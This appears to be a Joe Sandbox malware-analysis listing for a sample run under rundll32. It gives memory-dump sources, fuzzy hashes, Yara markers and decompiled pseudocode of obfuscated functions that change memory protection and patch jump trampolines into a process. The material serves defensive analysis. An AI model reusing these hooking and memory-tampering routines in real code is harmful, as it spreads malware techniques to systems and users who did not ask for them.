                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                • String ID:
                • API String ID: 3388242289-0
                • Opcode ID: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction ID: a76ceec288fbaf6dc7bb4001ceb0d604b93e307e3b988afb1047b141132d1c70
                • Opcode Fuzzy Hash: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction Fuzzy Hash: 86E01250D3DB424DFE5927E11082AB8275A0F9B301F4DE0F5D95D72183CD0D6599B521
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E000002152152060C3C8(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r9, long long _a8, long long _a16) {
                				void* _t6;
                				void* _t11;
                				intOrPtr _t13;
                				intOrPtr _t16;
                				void* _t27;
                				void* _t33;
                				void* _t36;
                
                				_t33 = __rdx;
                				_t31 = __rcx;
                				_t29 = __rbx;
                				_t27 = __rax;
                				_a8 = __rbx;
                				_a16 = __rsi;
                				GetLastError();
                				_t13 =  *0x2067c964; // 0xffffffff
                				if (_t13 == 0xffffffff) goto 0x2060c3f9;
                				_t6 = E000002152152060C9F4(_t13, _t13 - 0xffffffff, __rax, __rbx, __rcx);
                				if (__rax != 0) goto 0x2060c43a;
                				E0000021521520607C38(_t6, _t31, _t33); // executed
                				_t36 = _t27;
                				if (_t27 != 0) goto 0x2060c419;
                				E000002152152060A780(_t27, _t31);
                				goto 0x2060c43f;
                				_t16 =  *0x2067c964; // 0xffffffff
                				if (E000002152152060CA4C(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0x2060c412;
                				E000002152152060C0A0(_t36, _t27);
                				_t11 = E000002152152060A780(_t27, _t36);
                				if (_t36 != 0) goto 0x2060c449;
                				SetLastError(??);
                				goto 0x2060c454;
                				SetLastError(??);
                				return _t11;
                			}











                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction ID: 2b8271b2d37816b55eaf26bc4cde937980f6b1541e484b6713bc838b0af0f71c
                • Opcode Fuzzy Hash: bfdaeda6932f48ca5ff48361fe3939014b449c0591b6a111b209979d48e3d4ba
                • Instruction Fuzzy Hash: DA117032283F60C1FA78A765652D3BA1293BFE4BE0F6445A89D0A177DEDD38E44A4300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00000215215205CF9F0() {
                				signed int _v24;
                				intOrPtr _v28;
                				void* _v80;
                				intOrPtr _v88;
                				void* _t20;
                				signed long long _t23;
                				signed long long _t24;
                				void* _t29;
                				signed long long _t30;
                				void* _t31;
                				signed long long _t32;
                
                				_t32 = _t30;
                				_t23 =  *0x2067c720; // 0xca1645d940e
                				_t24 = _t23 ^ _t30;
                				_v24 = _t24;
                				 *(_t32 - 0x54) = _t24;
                				 *(_t32 - 0x4c) = _t24;
                				 *(_t32 - 0x44) = _t24;
                				 *(_t32 - 0x3c) = _t24;
                				 *(_t32 - 0x34) = _t24;
                				 *(_t32 - 0x2c) = _t24;
                				 *(_t32 - 0x24) = _t24;
                				_v28 = 0;
                				_v88 = 0x40;
                				GlobalMemoryStatusEx(??); // executed
                				return E00000215215205F59D0(_t20, _v24 ^ _t30, _t29, _t31);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: GlobalMemoryStatus
                • String ID: @
                • API String ID: 1890195054-2766056989
                • Opcode ID: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction ID: b681f89a967a78234ccfd654e9a5056eec856c4d10401cd12bc3e9c163f808dc
                • Opcode Fuzzy Hash: 2ecb87edcf64bce3e4ea576f9fe6ad7bb7e3c930542fbaf679872767e05fdeb0
                • Instruction Fuzzy Hash: 7FF0E23771AF50C9EB90CB22A81938D33E5F79C750F924139DA9D82714EF3995218F04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00007FFA7FFA535E1CF8(void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9) {
                				void* __rsi;
                				void* __rbp;
                				long _t198;
                				void* _t212;
                				void* _t217;
                				signed int _t232;
                				signed int _t235;
                				signed int _t247;
                				signed int _t251;
                				signed long long _t266;
                				signed int _t273;
                				intOrPtr* _t274;
                				void* _t286;
                				intOrPtr _t301;
                				signed long long _t340;
                				signed long long _t342;
                				signed long long _t357;
                				signed int _t364;
                				intOrPtr* _t368;
                				signed int _t369;
                				void* _t371;
                				void* _t372;
                				void* _t379;
                				long long _t384;
                				void* _t386;
                				void* _t389;
                
                				_t374 = __r8;
                				 *((long long*)(_t371 + 0x10)) = __rbx;
                				 *((long long*)(_t371 + 0x18)) = __r8;
                				_t368 = _t371 - 7;
                				_t372 = _t371 - 0x90;
                				_t384 =  *0x5367c000; // 0x2151e49def0
                				_t286 = __rcx;
                				r14d = 0x1fda;
                				r9d = 0x1c76;
                				r8d = 0x1320;
                				 *((long long*)(_t384 + 0x3a8)) =  *((intOrPtr*)(_t384 + 0x290));
                				_t6 = _t384 + 0x21e; // 0x2151e49e10e
                				 *(_t372 + 0x28) = _t6;
                				_t232 =  *((intOrPtr*)(_t384 + 0x290));
                				 *(_t372 + 0x20) = _t232;
                				E00007FFA7FFA535E1000(_t232, _t384, __r8, _t389, _t386); // executed
                				 *((long long*)(_t384 + 0x628)) =  *(_t368 + 0x77);
                				if (_t286 !=  *((intOrPtr*)(_t384 + 0x308))) goto 0x535e2162;
                				_t198 = GetCurrentThreadId();
                				 *(_t384 + 0x200) = _t198;
                				if (_t232 == 0) goto 0x535e2162;
                				 *(_t368 - 1) = 0;
                				asm("push ds");
                				 *0x1569 =  *0x1569 + _t198;
                				 *(_t368 - 5) = 0;
                				 *(_t368 - 0xd) = 0x651;
                				 *(_t368 - 9) = 0;
                				 *(_t368 + 0x47) = r14d;
                				r14d = 0xc92;
                				 *(_t368 - 0x15) = 0;
                				 *(_t368 + 0x77) = 0;
                				 *(_t368 - 0x11) =  *(_t368 - 0x11) + 0xfffff5c7;
                				r8d =  *(_t368 - 0x19);
                				r9d =  *(_t368 - 0x15);
                				r8d = r8d + 0x10ae;
                				r9d = r9d + _t198;
                				r11d =  *(_t368 - 0xd);
                				r11d = r11d + 0xe36;
                				r10d = r10d + _t198;
                				_t235 =  *(_t368 - 0x19);
                				 *(_t372 + 0x50) = _t235;
                				 *(_t372 + 0x48) = r10d;
                				 *((long long*)(_t372 + 0x40)) = _t384;
                				 *(_t372 + 0x38) = r11d;
                				 *(_t372 + 0x30) =  *(_t368 - 1);
                				 *(_t372 + 0x28) =  *(_t368 - 9) + 0x1569;
                				 *(_t372 + 0x20) =  *(_t368 - 0x11) - 0x8cc;
                				E00007FFA7FFA535F5694(_t235,  *(_t368 - 1),  *(_t368 + 0x47) - 0xf2c,  *(_t368 - 0xd) + 0x1556,  *(_t368 - 0x11) - 0x8cc, _t374); // executed
                				 *(_t368 - 1) = _t235;
                				if ( *(_t368 + 0x47) ==  *(_t368 + 0x77) + 0x1ad7) goto 0x535e214d;
                				if ( *(_t368 - 0xd) -  *(_t368 + 0x47) + 0xfffff37b >= 0) goto 0x535e1fcf;
                				r9d = 0x1515;
                				 *((long long*)(_t384 + 0x4a0)) =  *((intOrPtr*)(_t384 + 0xe8)) -  *((intOrPtr*)(_t384 + 0xf0));
                				_t301 =  *((intOrPtr*)(_t384 + 0x2a0));
                				 *((intOrPtr*)(_t384 + 0x390)) =  *((intOrPtr*)(_t384 + 0x390)) -  *(_t301 + 0x448) * 0x1515;
                				 *(_t301 + 0x330) =  *(_t301 + 0x330) ^ ( *(_t384 + 0x5e0) | 0x00001320);
                				 *( *((intOrPtr*)(_t384 + 0x108)) + 0x378) =  *( *((intOrPtr*)(_t384 + 0x108)) + 0x378) ^  *((intOrPtr*)(_t384 + 0x110)) + 0x00000478;
                				 *(_t368 - 0x19) =  *(_t368 - 0x19) + r9d;
                				if ( *(_t368 - 0xd) ==  *(_t368 - 0x19) + 0xe8) goto 0x535e214d;
                				 *(_t368 - 0x15) =  *(_t368 - 0x15) + 0x1c76;
                				 *(_t368 + 0x77) =  *(_t368 + 0x77) + r14d;
                				r8d =  *(_t368 - 0x19);
                				r12d =  *(_t368 - 1);
                				r8d = r8d + 0x692;
                				r15d =  *(_t368 - 0x15);
                				r12d = r12d + 0x771;
                				r14d =  *(_t368 - 0x11);
                				r15d = r15d - 0x1625;
                				r14d = r14d - 0xe36;
                				_t364 =  *(_t368 - 0x11) + 0x8e;
                				r11d =  *(_t368 + 0x47);
                				r10d =  *(_t368 + 0x77);
                				r11d = r11d - 0xc85;
                				r9d =  *(_t368 - 0xd);
                				r10d = r10d + 0xeb5;
                				r9d = r9d + 0x1ac3;
                				_t247 =  *(_t368 + 0x47) - 0x1348;
                				 *(_t372 + 0x68) = _t247;
                				 *(_t372 + 0x60) = r9d;
                				 *(_t372 + 0x58) = r10d;
                				 *(_t372 + 0x50) = r11d;
                				 *(_t372 + 0x48) =  *(_t368 - 5);
                				 *((long long*)(_t372 + 0x40)) =  *(_t368 + 0x47) - 0xac5;
                				 *(_t372 + 0x38) = _t364;
                				 *(_t372 + 0x30) = r14d;
                				 *(_t372 + 0x28) = r15d;
                				 *(_t372 + 0x20) = r12d;
                				E00007FFA7FFA535F59E8(_t247,  *(_t368 - 5),  *(_t368 + 0x47) - 0x1989,  *(_t368 - 0x15) - 0x7ef, _t364, _t374, _t384, _t379);
                				 *(_t368 - 0x15) = _t247;
                				 *(_t368 + 0x77) =  *(_t368 + 0x77) + 0xe45;
                				 *(_t368 + 0x47) =  *(_t368 + 0x47) + 0xfffffbcd;
                				goto 0x535e214d;
                				if (_t364 -  *(_t368 - 9) >= 0) goto 0x535e214d;
                				r12d = 0x1fda;
                				r9d =  *(_t368 - 0x19);
                				r8d =  *(_t384 + 0x2a8);
                				r9d = r9d |  *(_t384 + 0x198);
                				asm("inc ebp");
                				r10d =  *(_t368 - 0x11);
                				_t357 =  *(_t368 + 0x47) - 0x000016ce & 0x000010ae;
                				r11d =  *(_t384 + 0x90);
                				_t251 =  *(_t368 - 9);
                				r11d = r11d +  *((intOrPtr*)(_t384 + 0x240));
                				r10d = r10d -  *((intOrPtr*)(_t384 + 0x158));
                				r11d = r11d & r12d;
                				 *((long long*)(_t372 + 0x40)) =  *(_t368 + 0x77) + _t251;
                				 *(_t372 + 0x38) = r10d;
                				 *(_t372 + 0x30) = r11d;
                				 *(_t372 + 0x28) =  *(_t368 - 0x11);
                				 *(_t372 + 0x20) = _t357;
                				E00007FFA7FFA535F615C(_t251,  *(_t368 - 0x11),  *(_t368 - 0xd) *  *(_t368 - 0x19), _t384, _t374, _t384);
                				 *(_t368 - 0xd) = _t251;
                				asm("adc eax, 0x19ff6");
                				 *(_t368 - 0x19) =  *(_t368 - 0x15) + 0x15fd;
                				 *(_t368 - 5) =  *(_t368 - 5) - ( *(_t368 + 0x77) &  *(_t368 - 5) *  *(_t368 - 0x19));
                				 *((long long*)(_t384 + 0x1a8)) =  *(_t368 - 0xd) +  *(_t368 - 0x15);
                				_t340 =  *((intOrPtr*)(_t384 + 0x300)) +  *(_t368 - 0x11);
                				 *(_t384 + 0x188) =  *(_t384 + 0x188) * _t340;
                				 *(_t368 - 9) =  *(_t368 - 9) ^  *(_t368 + 0x77) ^ 0x00000bbb;
                				_t342 = _t340 &  *(_t368 - 9) & 0x00000651;
                				_t266 =  *(_t368 + 0x77) | _t342;
                				 *(_t368 + 0x77) = _t266;
                				 *(_t384 + 0x248) = _t266 & 0x00001b47;
                				 *(_t368 - 0x15) =  *(_t368 - 0x15) -  *(_t368 + 0x47) *  *(_t384 + 0x70);
                				if (_t364 + 2 -  *(_t368 - 9) < 0) goto 0x535e1fea;
                				 *((long long*)( *((intOrPtr*)(_t368 + 0x57)))) =  *((intOrPtr*)(_t384 + 0xe8));
                				goto 0x535e2281;
                				_t273 =  *(_t384 + 0x5e8);
                				r14d = 0xc92;
                				 *((intOrPtr*)( *((intOrPtr*)(_t384 + 0x108)) + 0x1c0)) =  *((intOrPtr*)( *((intOrPtr*)(_t384 + 0x108)) + 0x1c0)) + _t386 -  *((intOrPtr*)(_t273 + 0x298));
                				 *0xA0858B49000013E7 =  *((intOrPtr*)(0xa0858b49000013e7)) + _t217;
                				_t274 = _t368;
                				_t369 = _t273;
                				asm("pushad");
                				 *_t274 =  *_t274 + _t274;
                				 *((intOrPtr*)(_t274 + 0x2b)) =  *((intOrPtr*)(_t274 + 0x2b)) + _t217;
                				 *((intOrPtr*)(_t274 + 0x48000002)) = spl;
                				 *((intOrPtr*)(_t342 + 0x1c8)) =  *((intOrPtr*)(_t342 + 0x1c8)) + 0x145c;
                				 *( *((intOrPtr*)(_t384 + 0x160)) + 0x2f8) =  *( *((intOrPtr*)(_t384 + 0x160)) + 0x2f8) ^  *((intOrPtr*)(_t384 + 0x2a0)) + 0x00000128;
                				 *(_t372 + 0x48) =  *((intOrPtr*)(_t369 + 0x8f));
                				 *((long long*)(_t372 + 0x40)) =  *((intOrPtr*)(_t369 + 0x87));
                				 *(_t372 + 0x38) =  *((intOrPtr*)(_t369 + 0x7f));
                				 *(_t372 + 0x30) = _t357;
                				 *(_t372 + 0x28) =  *((intOrPtr*)(_t369 + 0x6f));
                				 *(_t372 + 0x20) =  *((intOrPtr*)(_t369 + 0x67));
                				 *((intOrPtr*)(_t384 + 0x3a8))();
                				r9d = 0x1569;
                				r8d = 0x1b47;
                				 *((long long*)( *((intOrPtr*)(_t384 + 0x2a0)) + 0x4b0)) =  *((intOrPtr*)( *((intOrPtr*)(_t384 + 0x20)) + 0x1a8)) - 0x1320;
                				 *( *((intOrPtr*)(_t384 + 0x240)) + 0xa0) =  *( *((intOrPtr*)(_t384 + 0x240)) + 0xa0) |  *(_t384 + 0x5e8);
                				_t188 = _t384 + 0x272; // 0x2151e49e162
                				 *((intOrPtr*)(_t188 - 0x75)) =  *((intOrPtr*)(_t188 - 0x75)) - _t217;
                				asm("int 0x48");
                				 *(_t372 + 0x20) =  *((intOrPtr*)(_t384 + 0x290));
                				_t212 = E00007FFA7FFA535E1000( *((intOrPtr*)(_t384 + 0x290)), _t188, _t364 + 2);
                				 *((long long*)( *((intOrPtr*)(_t384 + 0x108)) + 0x230)) =  *((long long*)( *((intOrPtr*)(_t384 + 0x108)) + 0x230)) + 0xfffff6f4;
                				return _t212;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual$CurrentNamedPipeSectionThreadViewWait
                • String ID:
                • API String ID: 922581720-0
                • Opcode ID: 043ec0deaac45b4c4069053e4fb17e1d3b4759086a301924f66aaf3b6465b002
                • Instruction ID: 3dd6035aafc7f54cdc7b52366728d3d791a9c11baef9463d68be2a2903e1fcca
                • Opcode Fuzzy Hash: 043ec0deaac45b4c4069053e4fb17e1d3b4759086a301924f66aaf3b6465b002
                • Instruction Fuzzy Hash: 13F15A73B14A848FE754CF69D484AAE37B9FB88788F114125EE4DA7B58DB38D910CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E00000215215205CA568(signed int __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed int __r9, long long _a8, char _a24, intOrPtr _a25, char _a28, signed int _a32) {
                				long long _v40;
                				void* __rsi;
                				void* __rbp;
                				signed char _t56;
                				int _t61;
                				void* _t65;
                				void* _t66;
                				void* _t73;
                				void* _t75;
                				void* _t78;
                				void* _t81;
                				signed char _t88;
                				signed long long _t92;
                				long long _t94;
                				void* _t97;
                				signed long long _t107;
                				intOrPtr* _t108;
                				signed long long _t109;
                				intOrPtr* _t111;
                				void* _t117;
                				long long _t118;
                				void* _t119;
                				long long _t120;
                				char* _t126;
                				intOrPtr* _t128;
                
                				_a8 = __rbx;
                				_a32 = __r9;
                				_a24 = __r8;
                				r9d = r9d | 0xffffffff;
                				r10d = 0;
                				_t75 =  *0x2068332c - r10d; // 0xa
                				_t118 = __rdx;
                				_t97 = __rcx;
                				if (_t75 <= 0) goto 0x205ca5f2;
                				_t107 = __rax * 0x3c;
                				_t92 =  *0x20683320; // 0x2151e660000
                				if ( *((char*)(_t107 + _t92)) == 0) goto 0x205ca5df;
                				if ( *((intOrPtr*)(_t107 + _t92 + 0x28)) != __rdx) goto 0x205ca5df;
                				_t108 =  *((intOrPtr*)(_t107 + _t92 + 0x30));
                				r8d = 0;
                				_t78 =  *_t108 - r8d;
                				if (_t78 <= 0) goto 0x205ca5d9;
                				asm("lock bts dword [ecx+edx+0x4], 0x0");
                				if (_t78 >= 0) goto 0x205ca5d6;
                				r8d = r8d + 1;
                				if (r8d -  *_t108 < 0) goto 0x205ca5bc;
                				goto 0x205ca5d9;
                				r9d = r8d;
                				if (r9d != 0xffffffff) goto 0x205ca5ed;
                				r10d = r10d + 1;
                				_t81 = r10d -  *0x2068332c; // 0xa
                				if (_t81 < 0) goto 0x205ca594;
                				if (_t108 != 0) goto 0x205ca612;
                				E00000215215205CA884(_t66, _t92, __rcx, __rdx, __rdx, _t119); // executed
                				_t109 = _t92;
                				if (_t92 == 0) goto 0x205ca616;
                				 *_t92 = 0x42;
                				r9d = 0;
                				 *((intOrPtr*)(_t92 + 4)) = 1;
                				 *(_t97 + 0x38) = r9d;
                				 *(_t97 + 0x30) = _t109;
                				if (_t109 != 0) goto 0x205ca626;
                				goto 0x205ca73a;
                				r8d = 0x2c;
                				_t117 = _t92 * 0x3e + _t109;
                				_t13 = _t117 + 0x16; // 0x16
                				_t120 = _t13;
                				E00000215215205CA828(0x90, _t120);
                				_t56 = E00000215215205CB0D8(_t65, 0x90, _t73, _t97,  *((intOrPtr*)(_t97 + 1)), _t120);
                				 *(_t97 + 9) = _t56 & 0x000000ff;
                				if (_t56 != 0) goto 0x205ca660;
                				 *(_t117 + 4) =  *(_t117 + 4) & 0x00000000;
                				goto 0x205ca61f;
                				_t111 =  *((intOrPtr*)(_t97 + 1));
                				_t126 = _t97 + 0xa;
                				if (_t126 == 0) goto 0x205ca686;
                				if (_t111 == 0) goto 0x205ca686;
                				_t88 = _t56;
                				if (_t88 == 0) goto 0x205ca686;
                				 *_t126 =  *_t111;
                				if (_t88 != 0) goto 0x205ca676;
                				 *((long long*)(_t97 + 0x28)) = _t118;
                				_t21 = _t117 + 4; // 0x4
                				 *0x206830a0 = _t120;
                				 *(_t117 + 0xa) =  *(_t117 + 0xa) & 0x00000000;
                				_a25 = _t21 -  *((intOrPtr*)(_t97 + 1)) - 1;
                				r9d = 0x40;
                				 *((short*)(_t117 + 8)) = 0x25ff;
                				 *((long long*)(_t117 + 0xe)) = 0x21520587db0;
                				r8d =  *(_t97 + 9) & 0x000000ff;
                				_t94 =  &_a32;
                				_v40 = _t94;
                				_a24 = 0xe9;
                				_t61 = VirtualProtectEx(??, ??, ??, ??, ??); // executed
                				if (_t61 == 0) goto 0x205ca65a;
                				 *(_t117 + 0x36) =  *(_t117 + 0x36) & 0x00000000;
                				 *((short*)(_t117 + 0x34)) = 0x25ff;
                				 *((long long*)(_t117 + 0x3a)) = _t94 +  *((intOrPtr*)(_t97 + 1));
                				_t128 =  *((intOrPtr*)(_t97 + 1));
                				if (_t128 == 0) goto 0x205ca714;
                				 *_t128 = _a24;
                				 *((char*)(_t128 + 4)) = _a28;
                				r8d =  *(_t97 + 9) & 0x000000ff;
                				r9d = _a32;
                				_v40 =  &_a32;
                				VirtualProtectEx(??, ??, ??, ??, ??); // executed
                				return 1;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction ID: 634c4f78c9f03c43ce1fc5f65ba713e24c0bd2fa6a89e08c7683f3170d9ce62f
                • Opcode Fuzzy Hash: 4bf50c46bb647c84ff8375c8539a0b715aed05018f51fe42ab3b111d6a1aa26d
                • Instruction Fuzzy Hash: 2651A3B3707BA0CAEB508F25A6083997BA1FBA4BA8F08C255EE55076D9DB38D451C710
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00007FFA7FFA535E229C(void* __edx, long long __rbx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
                				void* __rdi;
                				void* _t34;
                				void* _t35;
                				void* _t37;
                				void* _t39;
                				void* _t66;
                
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				if (__rsi !=  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x240)) + 0x68)) - 0x1582) goto 0x535e22da;
                				goto 0x535e23b3;
                				GetProcessHeap();
                				if (0 == 0) goto 0x535e2398;
                				RtlAllocateHeap(??, ??, ??); // executed
                				 *( *((intOrPtr*)(__r8 + 0x160)) + 0x300) =  *( *((intOrPtr*)(__r8 + 0x160)) + 0x300) * ( *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) - _t66);
                				 *((long long*)( *((intOrPtr*)(__r8 + 0x5e8)) + 0x128)) =  *((intOrPtr*)(__r8 + 0x2a0)) + 0xc8;
                				_t34 = E00007FFA7FFA535E3F50(_t35, __edx, _t37, _t39, 0,  *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x70) ^ 0x00001487, 0, __rsi);
                				 *(__r8 + 0x300) =  *(__r8 + 0x300) |  *((intOrPtr*)(__r8 + 0x358)) + 0x000005d8;
                				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x188) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x188) ^  *((intOrPtr*)(__r8 + 0x240)) + 0x00000108;
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x20)) + 0x5d0)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x20)) + 0x5d0)) + ( *( *((intOrPtr*)(__r8 + 0x20)) + 0x418) | 0x000011f1);
                				return _t34;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Heap$AllocateProcess
                • String ID:
                • API String ID: 1357844191-0
                • Opcode ID: 1bea795867cdc67a9f243395745fc9de72f20c6a38becadefaa0d8232ff38c6f
                • Instruction ID: 3c4552c6bf6584dfca272622f1ad2bc4cfabb9254a2c1859b8f8bf6e45a5c22c
                • Opcode Fuzzy Hash: 1bea795867cdc67a9f243395745fc9de72f20c6a38becadefaa0d8232ff38c6f
                • Instruction Fuzzy Hash: AD213772715F8486EB84CF6AE4843AD6369FB89F88F184036DF4D97769DE38D1928700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205D09D0(long long __rax, long long __rbx, signed long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                				long long _v32;
                				signed int _v40;
                				void* __rdi;
                				void* _t13;
                				void* _t15;
                				long long _t20;
                				long long _t23;
                				signed long long* _t31;
                				void* _t33;
                				void* _t35;
                				void* _t42;
                
                				_t20 = __rax;
                				_v32 = 0xfffffffe;
                				_a8 = __rbx;
                				_a32 = __rsi;
                				_t33 = __r9;
                				_t42 = __rdx;
                				_t31 = __rcx;
                				_v40 = _v40 & 0x00000000;
                				E00000215215205D15B8(_t13, __rcx, __r8);
                				_t23 = _t20;
                				_a16 = _t20;
                				_a24 = _t20;
                				if (_t20 == 0) goto 0x205d0a2c;
                				_t15 = E00000215215205D0950(_t23, _t20, _t42, __r8, _t33); // executed
                				 *_t31 =  *_t31 & 0x00000000;
                				_t31[1] = _t31[1] & 0x00000000;
                				_t10 = _t23 + 0x10; // 0x10
                				return E00000215215205D135C(_t15, _t23, _t31, _t10, _t31, _t33, _t35, _t23);
                			}















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception$AllocPtr::__Ptr_baseStatic
                • String ID:
                • API String ID: 2446911711-0
                • Opcode ID: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction ID: 9b5cad87b8bcdb4ce75d5520d071c55f1781befbcf8db9c69bf7ece3042f6f88
                • Opcode Fuzzy Hash: 3ee81a84e783e839f3571ab78e40daf51b1fb701907726a107132894d7ed6ea7
                • Instruction Fuzzy Hash: 1101AD33315B9082E6008B52B94439AA3A0FB99BF4F144629AEA807BDADB7CC0528704
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E00007FFA7FFA535E1000(signed int __rax, void* __rcx, long long __rsi, long long _a8, signed int _a24, intOrPtr _a40, intOrPtr _a48) {
                				void* __rdi;
                				int _t26;
                				void* _t27;
                				void* _t28;
                				void* _t29;
                				void* _t30;
                				void* _t46;
                				intOrPtr _t52;
                
                				_a8 = __rsi;
                				_t52 =  *((intOrPtr*)(__rcx + 0x20));
                				_t46 = __rcx;
                				r10d =  *((intOrPtr*)(_t52 + 0x340));
                				_a24 = _a24 & 0x00000000;
                				r10d = r10d - 0x11e4;
                				 *(_t52 + 0x370) =  *(_t52 + 0x370) * __rax;
                				r8d =  *( *((intOrPtr*)(__rcx + 0x160)) + 0x68);
                				r8d = r8d - 0x1542; // executed
                				VirtualProtect(??, ??, ??, ??);
                				E00007FFA7FFA535E3B00(_t27, _t28, _t29, _t30, _a40, _a48, r10d, __rcx, r10d);
                				r8d = _a24;
                				_t26 = VirtualProtect(??, ??, ??, ??);
                				 *((long long*)( *((intOrPtr*)(_t46 + 0x5e8)) + 0x298)) =  *((long long*)( *((intOrPtr*)(_t46 + 0x5e8)) + 0x298)) + 0xfffff0d4;
                				return _t26;
                			}












                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
